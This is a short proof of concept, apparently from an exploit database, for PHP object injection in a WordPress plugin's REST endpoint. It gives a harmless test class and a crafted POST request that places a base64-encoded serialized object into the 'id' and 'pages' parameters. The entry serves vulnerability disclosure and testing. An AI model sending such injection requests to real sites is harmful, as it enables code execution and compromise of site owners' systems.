Share 
## https://sploitus.com/exploit?id=WPEX-ID:F4197386-975D-4E53-8FC9-9425732DA9AF
To simulate a gadget chain, put the following code in a plugin:

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Use the add account function, intercept it and add or replace the id or pages parameter to Tzo0OiJFdmlsIjowOnt9Ow== (which is the base64 of O:4:"Evil":0:{};):

POST /wp-json/tweet-old-post/v8/api/?req=add_account_fb HTTP/1.1

{"id":"Tzo0OiJFdmlsIjowOnt9Ow==","pages":["Tzo0OiJFdmlsIjowOnt9Ow=="]}